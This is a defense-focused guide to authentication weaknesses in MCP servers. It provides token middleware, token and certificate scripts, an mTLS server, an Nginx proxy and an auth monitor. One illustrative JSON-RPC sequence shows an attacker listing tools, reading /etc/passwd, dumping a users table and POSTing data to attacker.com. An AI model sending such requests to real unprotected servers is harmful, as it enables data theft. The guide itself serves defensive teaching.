MCP Authentication Gaps: Securing MCP Server Authentication
A defense-focused guide to understanding authentication weaknesses in MCP server deployments -- 38% of scanned servers lack any authentication -- and implementing robust token-based auth, mTLS, and middleware-based access control.
The MCP specification deliberately leaves authentication as an implementation concern rather than a protocol requirement. This design decision -- intended to reduce adoption friction -- has resulted in a security landscape where 38% of the 500+ publicly accessible MCP servers scanned by the VulnerableMCP project implement no authentication whatsoever.
For MCP servers accessible over HTTP+SSE, the absence of authentication means that anyone who can reach the server endpoint can list its tools, invoke them, and receive results. For stdio-based servers running locally, the lack of authentication means that any process on the host can connect to the server's stdin/stdout.
Understanding the Authentication Gap
Why MCP Has No Built-In Authentication
The MCP protocol specification (version 2024-11-05) defines the message format, capability negotiation, and tool calling semantics, but explicitly does not define:
- How clients prove their identity to servers
- How servers validate that a client is authorized to call specific tools
- How transport channels are secured against eavesdropping or tampering
- How sessions are managed or revoked
MCP Protocol Layer (JSON-RPC 2.0):
┌────────────────────────────────────────┐
│ initialize / tools/list / tools/call │ ← No auth fields in protocol
└──────────────┬─────────────────────────┘
│
Transport Layer: │ ← Auth must be implemented here
┌──────────────┴─────────────────────────┐
│ stdio (local) │ HTTP+SSE (network) │
│ No auth │ Auth is "optional" │
│ Process-level │ TLS recommended │
│ isolation only│ but not required │
└────────────────────────────────────────┘
This layering means that security is entirely dependent on what the server implementer builds into the transport layer -- and most MCP server templates and tutorials ship without any authentication code.
Transport Types and Their Security Properties
stdio Transport:
┌──────────┐ stdin/stdout ┌──────────┐
│ MCP Host │ ◄──────────────► │ MCP │
│ (Client) │ (pipes) │ Server │
└──────────┘ └──────────┘
Security: Process isolation only
Auth: None (whoever spawns the process controls it)
Threats: Local privilege escalation, supply chain
(malicious package replaces server binary)
HTTP+SSE Transport:
┌──────────┐ HTTP POST/SSE ┌──────────┐
│ MCP │ ◄────────────────► │ MCP │
│ Client │ (network) │ Server │
└──────────┘ └──────────┘
Security: Depends entirely on implementation
Auth: Not required by spec -- must be added
Threats: Unauthorized access, MITM, session hijacking,
credential theft, denial of service
Streamable HTTP Transport (2025+):
┌──────────┐ HTTP streams ┌──────────┐
│ MCP │ ◄────────────────► │ MCP │
│ Client │ (bidirectional) │ Server │
└──────────┘ └──────────┘
Security: Same as HTTP+SSE but with session management
Auth: OAuth2 recommended but not enforced
Threats: Same as HTTP+SSE plus session fixation
What Unauthenticated Access Enables
An attacker who reaches an unauthenticated MCP server can:
- Discover capabilities: Call
tools/listto enumerate all available tools, their parameters, and descriptions - Execute tools: Call
tools/callwith arbitrary parameters to invoke any registered tool - Exfiltrate data: Use file-reading, database, or API tools to extract sensitive information
- Modify state: Use write tools to alter files, database records, or external systems
- Pivot further: Use the server's access to internal services as a lateral movement path
// An attacker can simply send JSON-RPC requests to an unauth'd MCP server
// Step 1: Discover tools
{"jsonrpc": "2.0", "method": "tools/list", "id": 1}
// Step 2: Read sensitive files
{"jsonrpc": "2.0", "method": "tools/call", "id": 2,
"params": {"name": "read_file", "arguments": {"path": "/etc/passwd"}}}
// Step 3: Access internal databases
{"jsonrpc": "2.0", "method": "tools/call", "id": 3,
"params": {"name": "query_db", "arguments": {"query": "SELECT * FROM users"}}}
// Step 4: Exfiltrate via available tools
{"jsonrpc": "2.0", "method": "tools/call", "id": 4,
"params": {"name": "http_request", "arguments": {
"url": "https://attacker.com/collect",
"method": "POST",
"body": "stolen_data_here"
}}}Implementing Token-Based Authentication for MCP Servers
The most straightforward defense is adding token-based authentication to HTTP+SSE MCP servers. Below is a complete implementation.
Authentication Middleware
"""
MCP Authentication Middleware
Implements Bearer token and API key authentication for MCP HTTP+SSE servers.
"""
import os
import hmac
import hashlib
import time
import json
import secrets
import logging
from functools import wraps
from dataclasses import dataclass, field
from typing import Optional, Callable
from datetime import datetime, timedelta
logger = logging.getLogger("mcp.auth")
@dataclass
class AuthToken:
"""Represents an authenticated API token."""
token_id: str
client_name: str
scopes: set[str] # Allowed tool names or "*" for all
created_at: datetime
expires_at: Optional[datetime]
rate_limit: int = 100 # Calls per minute
is_active: bool = True
@dataclass
class AuthResult:
"""Result of an authentication attempt."""
authenticated: bool
token: Optional[AuthToken] = None
error: Optional[str] = None
client_ip: Optional[str] = None
class MCPAuthProvider:
"""
Authentication provider for MCP servers.
Supports Bearer tokens and HMAC-signed API keys.
"""
def __init__(self, token_store_path: str = "/var/mcp/auth/tokens.json"):
self.token_store_path = token_store_path
self.tokens: dict[str, AuthToken] = {}
self._rate_tracker: dict[str, list[float]] = {}
self._load_tokens()
def _load_tokens(self):
"""Load token definitions from encrypted store."""
if not os.path.exists(self.token_store_path):
logger.warning("Token store not found at %s", self.token_store_path)
return
with open(self.token_store_path, 'r') as f:
data = json.load(f)
for entry in data.get("tokens", []):
# Store only the hash of each token for comparison
token = AuthToken(
token_id=entry["id"],
client_name=entry["client_name"],
scopes=set(entry.get("scopes", ["*"])),
created_at=datetime.fromisoformat(entry["created_at"]),
expires_at=(
datetime.fromisoformat(entry["expires_at"])
if entry.get("expires_at") else None
),
rate_limit=entry.get("rate_limit", 100),
is_active=entry.get("is_active", True),
)
# Key is the SHA-256 hash of the actual token value
self.tokens[entry["token_hash"]] = token
def authenticate(self, request_headers: dict,
client_ip: str = "unknown") -> AuthResult:
"""
Authenticate an incoming MCP request.
Checks for Bearer token in Authorization header or
X-API-Key header.
"""
# Extract token from headers
auth_header = request_headers.get("Authorization", "")
api_key = request_headers.get("X-API-Key", "")
raw_token = None
if auth_header.startswith("Bearer "):
raw_token = auth_header[7:]
elif api_key:
raw_token = api_key
if not raw_token:
logger.warning(
"Authentication failed: no token provided from %s", client_ip
)
return AuthResult(
authenticated=False,
error="No authentication token provided",
client_ip=client_ip,
)
# Hash the provided token and look up
token_hash = hashlib.sha256(raw_token.encode()).hexdigest()
token_record = self.tokens.get(token_hash)
if token_record is None:
logger.warning(
"Authentication failed: invalid token from %s", client_ip
)
return AuthResult(
authenticated=False,
error="Invalid authentication token",
client_ip=client_ip,
)
# Check token status
if not token_record.is_active:
return AuthResult(
authenticated=False,
error="Token has been revoked",
client_ip=client_ip,
)
if (token_record.expires_at and
datetime.utcnow() > token_record.expires_at):
return AuthResult(
authenticated=False,
error="Token has expired",
client_ip=client_ip,
)
# Check rate limit
if not self._check_rate_limit(token_record.token_id,
token_record.rate_limit):
return AuthResult(
authenticated=False,
token=token_record,
error="Rate limit exceeded",
client_ip=client_ip,
)
logger.info(
"Authenticated client '%s' (token: %s) from %s",
token_record.client_name, token_record.token_id, client_ip,
)
return AuthResult(
authenticated=True,
token=token_record,
client_ip=client_ip,
)
def authorize_tool_call(self, auth_result: AuthResult,
tool_name: str) -> bool:
"""Check if the authenticated client can call a specific tool."""
if not auth_result.authenticated or auth_result.token is None:
return False
scopes = auth_result.token.scopes
if "*" in scopes:
return True
return tool_name in scopes
def _check_rate_limit(self, token_id: str, limit: int) -> bool:
"""Simple sliding window rate limiter."""
now = time.time()
window = self._rate_tracker.setdefault(token_id, [])
# Remove entries older than 60 seconds
self._rate_tracker[token_id] = [
t for t in window if now - t < 60
]
if len(self._rate_tracker[token_id]) >= limit:
return False
self._rate_tracker[token_id].append(now)
return True
@staticmethod
def generate_token() -> tuple[str, str]:
"""
Generate a new API token.
Returns (raw_token, token_hash) -- only store the hash.
"""
raw_token = f"mcp_{secrets.token_urlsafe(32)}"
token_hash = hashlib.sha256(raw_token.encode()).hexdigest()
return raw_token, token_hashToken Management Script
#!/bin/bash
# mcp-token-manager.sh -- Generate and manage MCP server authentication tokens
# Usage: ./mcp-token-manager.sh generate|revoke|list [options]
set -euo pipefail
TOKEN_STORE="/var/mcp/auth/tokens.json"
BACKUP_DIR="/var/mcp/auth/backups"
ensure_store_exists() {
mkdir -p "$(dirname "$TOKEN_STORE")"
mkdir -p "$BACKUP_DIR"
chmod 700 "$(dirname "$TOKEN_STORE")"
if [ ! -f "$TOKEN_STORE" ]; then
echo '{"tokens": []}' > "$TOKEN_STORE"
chmod 600 "$TOKEN_STORE"
fi
}
generate_token() {
local client_name="${1:?Usage: generate <client_name> [scopes] [expiry_days]}"
local scopes="${2:-*}"
local expiry_days="${3:-90}"
ensure_store_exists
# Generate secure random token
local raw_token="mcp_$(openssl rand -base64 32 | tr -d '/+=' | head -c 43)"
local token_hash
token_hash=$(echo -n "$raw_token" | sha256sum | awk '{print $1}')
local token_id
token_id=$(openssl rand -hex 8)
local created_at
created_at=$(date -u +"%Y-%m-%dT%H:%M:%SZ")
local expires_at
expires_at=$(date -u -d "+${expiry_days} days" +"%Y-%m-%dT%H:%M:%SZ")
# Back up current store
cp "$TOKEN_STORE" "${BACKUP_DIR}/tokens_$(date +%s).json"
# Add token to store (store only the hash)
local tmp
tmp=$(mktemp)
jq --arg id "$token_id" \
--arg name "$client_name" \
--arg hash "$token_hash" \
--arg scopes "$scopes" \
--arg created "$created_at" \
--arg expires "$expires_at" \
'.tokens += [{
"id": $id,
"client_name": $name,
"token_hash": $hash,
"scopes": ($scopes | split(",")),
"created_at": $created,
"expires_at": $expires,
"rate_limit": 100,
"is_active": true
}]' "$TOKEN_STORE" > "$tmp"
mv "$tmp" "$TOKEN_STORE"
chmod 600 "$TOKEN_STORE"
echo "============================================"
echo " MCP Token Generated Successfully"
echo "============================================"
echo " Token ID: $token_id"
echo " Client: $client_name"
echo " Scopes: $scopes"
echo " Expires: $expires_at"
echo ""
echo " RAW TOKEN (save this -- it cannot be recovered):"
echo " $raw_token"
echo "============================================"
}
revoke_token() {
local token_id="${1:?Usage: revoke <token_id>}"
ensure_store_exists
cp "$TOKEN_STORE" "${BACKUP_DIR}/tokens_$(date +%s).json"
local tmp
tmp=$(mktemp)
jq --arg id "$token_id" \
'(.tokens[] | select(.id == $id)).is_active = false' \
"$TOKEN_STORE" > "$tmp"
mv "$tmp" "$TOKEN_STORE"
chmod 600 "$TOKEN_STORE"
echo "Token $token_id has been revoked."
}
list_tokens() {
ensure_store_exists
echo "Active MCP Tokens:"
echo "-------------------"
jq -r '.tokens[] | select(.is_active == true) |
"ID: \(.id) Client: \(.client_name) Scopes: \(.scopes | join(",")) Expires: \(.expires_at)"' \
"$TOKEN_STORE"
}
case "${1:-help}" in
generate) generate_token "${@:2}" ;;
revoke) revoke_token "${@:2}" ;;
list) list_tokens ;;
*) echo "Usage: $0 generate|revoke|list [options]" ;;
esacIntegrating Auth Middleware with an MCP Server
"""
Example: MCP server with authentication middleware using the Python SDK.
"""
from mcp.server import Server
from mcp.server.sse import SseServerTransport
from starlette.applications import Starlette
from starlette.routing import Route, Mount
from starlette.requests import Request
from starlette.responses import JSONResponse
from starlette.middleware import Middleware
from starlette.middleware.base import BaseHTTPMiddleware
import uvicorn
from mcp_auth import MCPAuthProvider
class MCPAuthMiddleware(BaseHTTPMiddleware):
"""Starlette middleware that enforces MCP authentication."""
# Paths that don't require authentication
PUBLIC_PATHS = {"/health", "/ready"}
def __init__(self, app, auth_provider: MCPAuthProvider):
super().__init__(app)
self.auth = auth_provider
async def dispatch(self, request: Request, call_next):
# Skip auth for health checks
if request.url.path in self.PUBLIC_PATHS:
return await call_next(request)
# Authenticate the request
client_ip = request.client.host if request.client else "unknown"
auth_result = self.auth.authenticate(
dict(request.headers), client_ip
)
if not auth_result.authenticated:
return JSONResponse(
{"jsonrpc": "2.0", "error": {
"code": -32001,
"message": auth_result.error
}},
status_code=401,
headers={"WWW-Authenticate": "Bearer"},
)
# Attach auth context to request state for tool-level authorization
request.state.auth = auth_result
return await call_next(request)
# Create the MCP server
server = Server("secure-mcp-server")
auth_provider = MCPAuthProvider("/var/mcp/auth/tokens.json")
# Define tools with authorization checks
@server.list_tools()
async def list_tools():
return [
{
"name": "read_file",
"description": "Read a file from the workspace",
"inputSchema": {
"type": "object",
"properties": {"path": {"type": "string"}},
"required": ["path"],
},
},
{
"name": "query_database",
"description": "Run a read-only database query",
"inputSchema": {
"type": "object",
"properties": {"query": {"type": "string"}},
"required": ["query"],
},
},
]
@server.call_tool()
async def call_tool(name: str, arguments: dict):
# Tool-level authorization would be checked here using request.state.auth
# This is a simplified example
if name == "read_file":
path = arguments["path"]
# ... validated file reading logic ...
return [{"type": "text", "text": f"Contents of {path}"}]
elif name == "query_database":
query = arguments["query"]
# ... validated query logic ...
return [{"type": "text", "text": f"Query results for: {query}"}]
# Wire up the Starlette app with auth middleware
sse = SseServerTransport("/messages/")
async def handle_sse(request: Request):
async with sse.connect_sse(
request.scope, request.receive, request._send
) as streams:
await server.run(
streams[0], streams[1], server.create_initialization_options()
)
app = Starlette(
routes=[
Route("/sse", endpoint=handle_sse),
Mount("/messages/", app=sse.handle_post_message),
],
middleware=[
Middleware(MCPAuthMiddleware, auth_provider=auth_provider),
],
)
if __name__ == "__main__":
uvicorn.run(app, host="127.0.0.1", port=8443, ssl_certfile="/var/mcp/certs/server.crt",
ssl_keyfile="/var/mcp/certs/server.key")Configuring mTLS for High-Security Deployments
For environments handling sensitive data or operating in regulated industries, mutual TLS provides strong cryptographic authentication where both client and server present certificates.
Certificate Authority Setup
#!/bin/bash
# setup-mcp-ca.sh -- Create a private CA for MCP mTLS authentication
set -euo pipefail
CA_DIR="/var/mcp/ca"
CERT_DAYS=365
CA_DAYS=3650
mkdir -p "${CA_DIR}"/{certs,private,crl,newcerts}
chmod 700 "${CA_DIR}/private"
touch "${CA_DIR}/index.txt"
echo 1000 > "${CA_DIR}/serial"
echo "[*] Generating CA private key..."
openssl genrsa -aes256 -out "${CA_DIR}/private/ca.key" 4096
chmod 400 "${CA_DIR}/private/ca.key"
echo "[*] Creating CA certificate..."
openssl req -new -x509 -days ${CA_DAYS} \
-key "${CA_DIR}/private/ca.key" \
-out "${CA_DIR}/certs/ca.crt" \
-subj "/C=US/ST=Security/O=MCP Security/CN=MCP Internal CA" \
-addext "basicConstraints=critical,CA:TRUE,pathlen:0" \
-addext "keyUsage=critical,keyCertSign,cRLSign"
echo "[*] Generating MCP server certificate..."
openssl genrsa -out "${CA_DIR}/private/mcp-server.key" 2048
chmod 400 "${CA_DIR}/private/mcp-server.key"
openssl req -new \
-key "${CA_DIR}/private/mcp-server.key" \
-out "${CA_DIR}/certs/mcp-server.csr" \
-subj "/C=US/ST=Security/O=MCP Security/CN=mcp-server"
openssl x509 -req -days ${CERT_DAYS} \
-in "${CA_DIR}/certs/mcp-server.csr" \
-CA "${CA_DIR}/certs/ca.crt" \
-CAkey "${CA_DIR}/private/ca.key" \
-CAcreateserial \
-out "${CA_DIR}/certs/mcp-server.crt" \
-extfile <(cat <<-EXTEOF
basicConstraints = CA:FALSE
keyUsage = digitalSignature, keyEncipherment
extendedKeyUsage = serverAuth
subjectAltName = DNS:mcp-server,DNS:mcp-server.internal,IP:127.0.0.1
EXTEOF
)
echo "[+] CA and server certificates created."
echo " CA cert: ${CA_DIR}/certs/ca.crt"
echo " Server cert: ${CA_DIR}/certs/mcp-server.crt"
echo " Server key: ${CA_DIR}/private/mcp-server.key"#!/bin/bash
# generate-mcp-client-cert.sh -- Generate a client certificate for MCP mTLS
# Usage: ./generate-mcp-client-cert.sh <client_name>
set -euo pipefail
CA_DIR="/var/mcp/ca"
CLIENT_NAME="${1:?Usage: generate-mcp-client-cert.sh <client_name>}"
CERT_DAYS=90
echo "[*] Generating client key for '${CLIENT_NAME}'..."
openssl genrsa -out "${CA_DIR}/private/${CLIENT_NAME}.key" 2048
chmod 400 "${CA_DIR}/private/${CLIENT_NAME}.key"
echo "[*] Creating CSR..."
openssl req -new \
-key "${CA_DIR}/private/${CLIENT_NAME}.key" \
-out "${CA_DIR}/certs/${CLIENT_NAME}.csr" \
-subj "/C=US/ST=Security/O=MCP Security/CN=${CLIENT_NAME}"
echo "[*] Signing with CA..."
openssl x509 -req -days ${CERT_DAYS} \
-in "${CA_DIR}/certs/${CLIENT_NAME}.csr" \
-CA "${CA_DIR}/certs/ca.crt" \
-CAkey "${CA_DIR}/private/ca.key" \
-CAcreateserial \
-out "${CA_DIR}/certs/${CLIENT_NAME}.crt" \
-extfile <(cat <<-EXTEOF
basicConstraints = CA:FALSE
keyUsage = digitalSignature
extendedKeyUsage = clientAuth
EXTEOF
)
echo "[+] Client certificate created for '${CLIENT_NAME}'."
echo " Cert: ${CA_DIR}/certs/${CLIENT_NAME}.crt"
echo " Key: ${CA_DIR}/private/${CLIENT_NAME}.key"
echo " Expires in ${CERT_DAYS} days"
echo ""
echo " To use with curl:"
echo " curl --cert ${CA_DIR}/certs/${CLIENT_NAME}.crt \\"
echo " --key ${CA_DIR}/private/${CLIENT_NAME}.key \\"
echo " --cacert ${CA_DIR}/certs/ca.crt \\"
echo " https://mcp-server:8443/sse"mTLS-Enabled MCP Server Configuration
"""
MCP server with mTLS authentication.
Extracts client identity from the TLS certificate.
"""
import ssl
import logging
from starlette.applications import Starlette
from starlette.requests import Request
from starlette.responses import JSONResponse
from starlette.routing import Route
import uvicorn
logger = logging.getLogger("mcp.mtls")
# Client certificate CN -> allowed tool scopes
CLIENT_PERMISSIONS = {
"agent-production": {"*"}, # Full access
"agent-staging": {"read_file", "list_files"}, # Read-only
"monitoring": {"health_check", "get_metrics"}, # Monitoring only
}
def create_ssl_context() -> ssl.SSLContext:
"""Create SSL context with mTLS configuration."""
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# Server certificate and key
ctx.load_cert_chain(
certfile="/var/mcp/ca/certs/mcp-server.crt",
keyfile="/var/mcp/ca/private/mcp-server.key",
)
# Require client certificates signed by our CA
ctx.load_verify_locations(cafile="/var/mcp/ca/certs/ca.crt")
ctx.verify_mode = ssl.CERT_REQUIRED
# Strong TLS configuration
ctx.minimum_version = ssl.TLSVersion.TLSv1_3
ctx.set_ciphers("ECDHE+AESGCM:ECDHE+CHACHA20:DHE+AESGCM")
# Load CRL for revoked certificates
ctx.load_verify_locations(cafile="/var/mcp/ca/crl/revoked.pem")
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
return ctx
async def extract_client_identity(request: Request) -> dict:
"""Extract client identity from the mTLS certificate."""
# Get the peer certificate from the transport
transport = request.scope.get("transport")
if not transport:
return {"authenticated": False, "error": "No transport"}
peercert = transport.get_extra_info("peercert")
if not peercert:
return {"authenticated": False, "error": "No client certificate"}
# Extract Common Name
subject = dict(x[0] for x in peercert.get("subject", ()))
client_cn = subject.get("commonName", "unknown")
# Look up permissions
scopes = CLIENT_PERMISSIONS.get(client_cn)
if scopes is None:
logger.warning("Unknown client CN: %s", client_cn)
return {
"authenticated": True,
"authorized": False,
"client_cn": client_cn,
"error": "Client not in permissions table",
}
return {
"authenticated": True,
"authorized": True,
"client_cn": client_cn,
"scopes": scopes,
}
async def handle_tool_call(request: Request):
"""Handle MCP tool calls with mTLS-based authorization."""
identity = await extract_client_identity(request)
if not identity.get("authenticated"):
return JSONResponse({"error": "mTLS authentication failed"}, status_code=401)
if not identity.get("authorized"):
return JSONResponse({"error": "Client not authorized"}, status_code=403)
# Parse JSON-RPC request
body = await request.json()
tool_name = body.get("params", {}).get("name", "")
# Check tool-level authorization
if "*" not in identity["scopes"] and tool_name not in identity["scopes"]:
logger.warning(
"Client %s attempted unauthorized tool call: %s",
identity["client_cn"], tool_name,
)
return JSONResponse({
"jsonrpc": "2.0",
"error": {"code": -32003, "message": f"Not authorized for tool: {tool_name}"},
"id": body.get("id"),
}, status_code=403)
# Process the authorized tool call
logger.info("Authorized %s -> %s", identity["client_cn"], tool_name)
# ... tool execution logic ...
return JSONResponse({"jsonrpc": "2.0", "result": {"status": "ok"}, "id": body.get("id")})
app = Starlette(routes=[Route("/mcp", handle_tool_call, methods=["POST"])])
if __name__ == "__main__":
uvicorn.run(
app,
host="0.0.0.0",
port=8443,
ssl=create_ssl_context(),
)Nginx Reverse Proxy with Authentication
For production deployments, place an Nginx reverse proxy in front of MCP servers:
# /etc/nginx/conf.d/mcp-server.conf
# Nginx reverse proxy for MCP server with authentication
upstream mcp_backend {
server 127.0.0.1:8080;
keepalive 32;
}
# Rate limiting zones
limit_req_zone $binary_remote_addr zone=mcp_init:10m rate=5r/m;
limit_req_zone $binary_remote_addr zone=mcp_tools:10m rate=30r/m;
limit_conn_zone $binary_remote_addr zone=mcp_conn:10m;
server {
listen 443 ssl http2;
server_name mcp.internal.example.com;
# TLS configuration
ssl_certificate /var/mcp/ca/certs/mcp-server.crt;
ssl_certificate_key /var/mcp/ca/private/mcp-server.key;
ssl_protocols TLSv1.3;
ssl_ciphers ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384;
ssl_prefer_server_ciphers on;
# mTLS -- require client certificates
ssl_client_certificate /var/mcp/ca/certs/ca.crt;
ssl_verify_client on;
ssl_verify_depth 2;
ssl_crl /var/mcp/ca/crl/revoked.pem;
# Connection limits
limit_conn mcp_conn 10;
# Security headers
add_header X-Content-Type-Options nosniff always;
add_header X-Frame-Options DENY always;
add_header Strict-Transport-Security "max-age=31536000; includeSubDomains" always;
# Health check (no auth required)
location /health {
proxy_pass http://mcp_backend/health;
access_log off;
}
# SSE endpoint (initialization)
location /sse {
limit_req zone=mcp_init burst=3 nodelay;
# Pass client certificate info to backend
proxy_set_header X-Client-CN $ssl_client_s_dn_cn;
proxy_set_header X-Client-Verified $ssl_client_verify;
proxy_set_header X-Client-Fingerprint $ssl_client_fingerprint;
# SSE-specific proxy settings
proxy_pass http://mcp_backend/sse;
proxy_http_version 1.1;
proxy_set_header Connection "";
proxy_buffering off;
proxy_cache off;
proxy_read_timeout 3600s;
proxy_send_timeout 3600s;
}
# Tool call endpoint
location /messages/ {
limit_req zone=mcp_tools burst=10 nodelay;
proxy_set_header X-Client-CN $ssl_client_s_dn_cn;
proxy_set_header X-Client-Verified $ssl_client_verify;
proxy_pass http://mcp_backend/messages/;
proxy_http_version 1.1;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
# Request body size limit
client_max_body_size 1m;
}
# Block everything else
location / {
return 404;
}
# Access logging with client identity
access_log /var/log/nginx/mcp-access.log combined;
error_log /var/log/nginx/mcp-error.log warn;
}
# Redirect HTTP to HTTPS
server {
listen 80;
server_name mcp.internal.example.com;
return 301 https://$server_name$request_uri;
}Authentication Monitoring and Alerting
"""
MCP Authentication monitoring -- detects authentication anomalies.
"""
import json
import logging
from datetime import datetime, timedelta
from collections import defaultdict
from dataclasses import dataclass, field
logger = logging.getLogger("mcp.auth.monitor")
@dataclass
class AuthEvent:
timestamp: datetime
client_ip: str
client_cn: str
event_type: str # success, failure, revoked, expired, rate_limited
tool_name: str = ""
details: str = ""
class AuthMonitor:
"""Monitors authentication events for anomalies."""
def __init__(self, alert_callback=None):
self.events: list[AuthEvent] = []
self.failure_counts: dict[str, int] = defaultdict(int)
self.alert_callback = alert_callback or self._default_alert
self._alert_thresholds = {
"brute_force": 10, # failures per IP per hour
"credential_stuffing": 5, # unique invalid tokens per IP per hour
"unusual_scope": 3, # unauthorized tool access attempts
}
def record_event(self, event: AuthEvent):
"""Record and analyze an authentication event."""
self.events.append(event)
if event.event_type == "failure":
self.failure_counts[event.client_ip] += 1
self._check_brute_force(event)
if event.event_type == "unauthorized_tool":
self._check_scope_abuse(event)
# Prune old events (keep 24 hours)
cutoff = datetime.utcnow() - timedelta(hours=24)
self.events = [e for e in self.events if e.timestamp > cutoff]
def _check_brute_force(self, event: AuthEvent):
"""Detect brute force authentication attempts."""
cutoff = datetime.utcnow() - timedelta(hours=1)
recent_failures = sum(
1 for e in self.events
if e.client_ip == event.client_ip
and e.event_type == "failure"
and e.timestamp > cutoff
)
if recent_failures >= self._alert_thresholds["brute_force"]:
self.alert_callback({
"alert_type": "brute_force_detected",
"severity": "high",
"client_ip": event.client_ip,
"failure_count": recent_failures,
"window": "1 hour",
"recommendation": f"Block IP {event.client_ip} and investigate",
})
def _check_scope_abuse(self, event: AuthEvent):
"""Detect clients trying to access unauthorized tools."""
cutoff = datetime.utcnow() - timedelta(hours=1)
scope_violations = sum(
1 for e in self.events
if e.client_cn == event.client_cn
and e.event_type == "unauthorized_tool"
and e.timestamp > cutoff
)
if scope_violations >= self._alert_thresholds["unusual_scope"]:
self.alert_callback({
"alert_type": "scope_abuse_detected",
"severity": "high",
"client_cn": event.client_cn,
"violation_count": scope_violations,
"last_tool": event.tool_name,
"recommendation": (
f"Review permissions for {event.client_cn} "
f"and check for compromised credentials"
),
})
def _default_alert(self, alert: dict):
logger.critical(json.dumps({
"event": "mcp_auth_alert",
**alert,
"timestamp": datetime.utcnow().isoformat(),
}))
def get_dashboard_stats(self) -> dict:
"""Return stats for security dashboard."""
cutoff_1h = datetime.utcnow() - timedelta(hours=1)
cutoff_24h = datetime.utcnow() - timedelta(hours=24)
events_1h = [e for e in self.events if e.timestamp > cutoff_1h]
events_24h = [e for e in self.events if e.timestamp > cutoff_24h]
return {
"last_hour": {
"total": len(events_1h),
"successes": sum(1 for e in events_1h if e.event_type == "success"),
"failures": sum(1 for e in events_1h if e.event_type == "failure"),
"unique_ips": len(set(e.client_ip for e in events_1h)),
},
"last_24h": {
"total": len(events_24h),
"successes": sum(1 for e in events_24h if e.event_type == "success"),
"failures": sum(1 for e in events_24h if e.event_type == "failure"),
"unique_ips": len(set(e.client_ip for e in events_24h)),
"unique_clients": len(set(
e.client_cn for e in events_24h if e.event_type == "success"
)),
},
}Securing stdio-Based MCP Servers
stdio servers do not use network authentication, but they still need access control:
"""
Security controls for stdio-based MCP servers.
Since stdio uses process-level access, controls focus on:
- Verifying the parent process identity
- Restricting which tools the spawning process can access
- Logging all operations for audit
"""
import os
import json
import logging
from pathlib import Path
logger = logging.getLogger("mcp.stdio.security")
def verify_parent_process() -> dict:
"""
Verify the identity of the process that spawned this MCP server.
Returns parent process information for authorization decisions.
"""
ppid = os.getppid()
parent_info = {}
try:
# Read parent process command line
cmdline_path = f"/proc/{ppid}/cmdline"
with open(cmdline_path, 'rb') as f:
cmdline = f.read().decode('utf-8', errors='replace').split('\x00')
parent_info["cmdline"] = cmdline
# Read parent process executable
exe_path = os.readlink(f"/proc/{ppid}/exe")
parent_info["executable"] = exe_path
# Read parent process user
stat_path = f"/proc/{ppid}/status"
with open(stat_path, 'r') as f:
for line in f:
if line.startswith("Uid:"):
uids = line.split()[1:]
parent_info["uid"] = int(uids[0])
elif line.startswith("Gid:"):
gids = line.split()[1:]
parent_info["gid"] = int(gids[0])
except (FileNotFoundError, PermissionError) as e:
logger.error("Cannot verify parent process %d: %s", ppid, e)
parent_info["error"] = str(e)
return parent_info
# Allowlist of executables that may spawn this MCP server
ALLOWED_PARENTS = {
"/usr/bin/claude",
"/usr/local/bin/cursor",
"/usr/bin/code",
"/opt/mcp-host/bin/mcp-host",
}
def enforce_parent_allowlist():
"""Refuse to start if the parent process is not in the allowlist."""
parent = verify_parent_process()
exe = parent.get("executable", "unknown")
if exe not in ALLOWED_PARENTS:
logger.critical(
"MCP server started by unauthorized parent: %s (PID %d)",
exe, os.getppid()
)
raise SystemExit(
f"Unauthorized parent process: {exe}. "
f"Allowed: {ALLOWED_PARENTS}"
)
logger.info("Parent process verified: %s (PID %d)", exe, os.getppid())References
- VulnerableMCP Project: Systematic scan of 500+ public MCP servers finding 38% without authentication
- eSentire CISO Advisory: "Securing MCP Deployments" -- enterprise guidance for MCP authentication
- MCP Specification: Model Context Protocol -- Transport and session management sections
- OWASP ASI: Agentic Security Initiative -- Authentication and access control requirements
- Pomerium: "Zero Trust for MCP" -- proxy-based authentication for MCP servers
- RFC 8705: OAuth 2.0 Mutual-TLS Client Authentication and Certificate-Bound Access Tokens